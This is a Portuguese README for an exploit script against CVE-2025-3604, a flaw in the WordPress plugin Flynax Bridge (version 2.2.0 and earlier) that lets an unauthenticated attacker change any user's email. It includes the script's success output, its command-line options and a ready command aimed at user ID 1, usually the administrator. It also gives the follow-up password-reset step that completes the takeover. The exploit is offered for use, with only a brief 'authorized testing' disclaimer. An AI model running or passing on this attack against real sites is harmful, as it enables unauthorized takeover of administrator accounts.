
Flynax Bridge <= 2.2.0 - Escalação de Privilégios Não Autenticada via Assunção de Conta
O plugin Flynax Bridge para WordPress é vulnerável a escalação de privilégios via roubo de conta em todas as versões até, e incluindo, 2.2.0.
Isso se deve ao fato de o plugin não validar corretamente a identidade de um usuário antes de atualizar seus detalhes de conta (como e-mail). Como resultado, atacantes não autenticados podem alterar o endereço de e-mail de qualquer usuário, incluindo administradores, e então iniciar uma redefinição de senha para assumir totalmente a conta.
CVE: CVE-2025-3604
CVSS: 9.8 (Crítico)
Publicado: 23 de abril de 2025
Última Atualização: 24 de abril de 2025
Detected plugin version: 2.2.0
Version is vulnerable. Attempting exploit...
Exploit succeeded! Email changed to: [email protected]
Exploit By Nxploited (Khaled_alenazi) | https://github.com/Nxploited
Após a exploração bem-sucedida, o atacante pode ir para a página de login do WordPress e clicar em "Perdeu sua senha?" usando o e-mail recém-definido para redefinir a senha e obter acesso total à conta alvo.
usage: CVE-2025-3604.py [-h] -u URL [-mail NEWMAIL] -id USER_ID
WordPress Flynax Bridge Unauthenticated Privilege Escalation via Account # By Nxploited (Khaled Alenazi)
options:
-h, --help show this help message and exit
-u, --url URL Target URL
-mail, --newmail NEWMAIL
New email to set
-id, --user_id USER_ID User ID to exploit
python3 CVE-2025-3604.py -u "http://TARGET/wordpress/" -id "1" -mail "[email protected]"
-u: URL base do site WordPress.-id: ID do usuário a ser alvo (geralmente 1 para admin).-mail: Novo e-mail que será definido para esse usuário.Use por sua conta e risco. Apenas para testes autorizados e fins educacionais.
POR: Nxploited ( Khaled_alenazi )